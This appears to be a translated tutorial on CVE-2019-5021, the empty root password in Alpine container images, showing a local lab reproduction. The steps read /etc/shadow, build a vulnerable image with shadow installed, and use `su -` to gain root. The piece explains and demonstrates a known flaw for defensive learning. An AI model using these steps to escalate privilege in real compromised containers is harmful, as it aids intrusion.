CVE-2019-5021 Image Vulnerability Exploitation
With the popularity of container technology, container images have also become a very important part of the software supply chain. Just like using tools such as pip to obtain various programming software libraries from warehouses, people can pull images from Docker Hub or third-party warehouses, develop on the basis of them, so as to achieve the required functions, and finally package and release
However, there may be problems with the basic image that the business relies on—whether it is a security hole accidentally caused by the developer or a malicious code deliberately buried by the attacker. The potential harm of this "endogenous risk" is much more serious than that of hackers launching an attack from the outside , and are less likely to be detected.
Let's introduce a kind of container software supply chain attack: image vulnerability exploitation
Mirror exploit
Image vulnerability exploitation refers to the fact that when there are vulnerabilities in the image itself, the container created and run using the image usually has the same vulnerability. Attackers can exploit the vulnerabilities in the image to attack the container, which often has the effect of getting twice the result.
For example, Alpine is a lightweight Linux distribution built on top of musl libc and busybox. Software built on top of Alpine is very popular due to its small size. But there was a vulnerability in the Alpine image: CVE-2019-5021. In the Alpine images of versions 3.3~3.9, the password of the root user is set to be empty, and the attacker may use this to elevate the root privilege inside the container after breaking into the container
This vulnerability looks very simple, but the CVSS3.0 score is as high as 9.8 points. We pull a version 3.3 image, then build a container and check the password information file "/etc/shadow", as shown in the figure, the root password recorded in the shadow file is indeed empty
#拉取alpine:3.3的镜像
docker pull alpine:3.3
#查看shadow 文件记录的 root 密码
docker run -it --rm alpine:3.3 cat /etc/shadow | grep root
The Alpine image uses busybox as the core tool chain, and restricts the tty devices that can log in to the root user through the /etc/securetty file. Unless the user actively installs shadow and linux-pam instead of the default toolchain, this vulnerability will be very difficult to exploit. Next, let's simulate this scenario. Create a mirror based on Apline version 3.5, add a common user non_root, and install shadow (https://github.com/brant-ruan/cloud-native-security-book/0303-supply chain attack/01-CVE-2019 -5021-alpine)
Vulnerability recurrence
We write the following Dockerfile:
FROM alpine:3.5
RUN apk add --no-cache shadow
RUN adduser -S non_root
USER non_root
After creation, execute the following command in the same directory as the Dockerfile to build the image:
docker build -t alpine:cve-2019-5021 .
Then run a container and try to execute su to switch to the root user. The switch is successful as shown in the figure:
#运行一个容器
docker run -it --rm alpine:cve-2019-5021 /bin/sh
#查看当前用户
whoami
#且换为root用户
su -
The whole process is very simple. In reality, if the user uses an old version of Alpine and installs shadow at the same time, once the attacker obtains a low-privilege shell in the container by using the web service, he can use this vulnerability to directly upgrade to the shell in the container. root privileges.